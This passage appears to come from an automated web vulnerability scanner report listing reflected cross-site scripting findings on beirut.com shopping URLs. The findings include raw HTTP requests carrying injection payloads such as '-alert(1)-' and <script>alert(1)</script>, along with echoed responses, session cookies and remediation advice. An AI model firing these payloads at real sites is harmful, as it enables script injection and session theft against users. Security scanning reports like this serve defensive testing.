Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:48:54 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59566

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Tapistry2b065'-alert(1)-'1624f652c94/50';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1037. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tapistry/50 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tapistry/50

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eaa13'-alert(1)-'14f1b8ace88 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Tapistry/50eaa13'-alert(1)-'14f1b8ace88 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:51:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54931

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/Tapistry/50eaa13'-alert(1)-'14f1b8ace88';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1038. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15ce1"><a>5288377418 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping15ce1"><a>5288377418/Home-Furnishings/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:26:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping15ce1"><a>5288377418">
...[SNIP]...

4.1039. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a640a'-alert(1)-'45f99ddf7ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shoppinga640a'-alert(1)-'45f99ddf7ee/Home-Furnishings/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:32:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60155

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shoppinga640a'-alert(1)-'45f99ddf7ee/Home-Furnishings/4120758082/Textiles/4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1040. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c2963<script>alert(1)</script>66480a50eeb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingsc2963<script>alert(1)</script>66480a50eeb/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingsc2963<script>alert(1)</script>66480a50eeb <a href="#" id="backlink">
...[SNIP]...

4.1041. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4920'-alert(1)-'e0969ad4d83 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishingse4920'-alert(1)-'e0969ad4d83/4120758082/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:13 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61386

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishingse4920'-alert(1)-'e0969ad4d83/4120758082/Textiles/4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1042. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2caff'-alert(1)-'f977dcaee9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/41207580822caff'-alert(1)-'f977dcaee9a/Textiles/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:42:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/41207580822caff'-alert(1)-'f977dcaee9a/Textiles/4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1043. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da01f'-alert(1)-'1ec5f28cd68 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Textilesda01f'-alert(1)-'1ec5f28cd68/4 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:49:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61331

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/Textilesda01f'-alert(1)-'1ec5f28cd68/4';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1044. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Textiles/4 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Textiles/4

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 78fd0'-alert(1)-'f64efe3a9fd was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Textiles/478fd0'-alert(1)-'f64efe3a9fd HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:57:33 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54775

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Home-Furnishings/4120758082/Textiles/478fd0'-alert(1)-'f64efe3a9fd';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1045. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 821ac"><a>cdaf24a24dc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping821ac"><a>cdaf24a24dc/Home-Furnishings/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:07:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60115

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping821ac"><a>cdaf24a24dc">
...[SNIP]...

4.1046. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79a03'-alert(1)-'ecbe13b7b22 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping79a03'-alert(1)-'ecbe13b7b22/Home-Furnishings/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:23 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping79a03'-alert(1)-'ecbe13b7b22/Home-Furnishings/4120758082/Tools-Hardware/30';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1047. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 21a5f<script>alert(1)</script>d6e699e23c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishings21a5f<script>alert(1)</script>d6e699e23c8/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:19:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55405

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishings21a5f<script>alert(1)</script>d6e699e23c8 <a href="#" id="backlink">
...[SNIP]...

4.1048. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2e3c'-alert(1)-'1ef30aba2cb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishingse2e3c'-alert(1)-'1ef30aba2cb/4120758082/Tools-Hardware/30 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:18:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishingse2e3c'-alert(1)-'1ef30aba2cb/4120758082/Tools-Hardware/30';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.1049. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Tools-Hardware/30 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Tools-Hardware/30

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 598bf'-alert(1)-'dd8bdd55a7d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

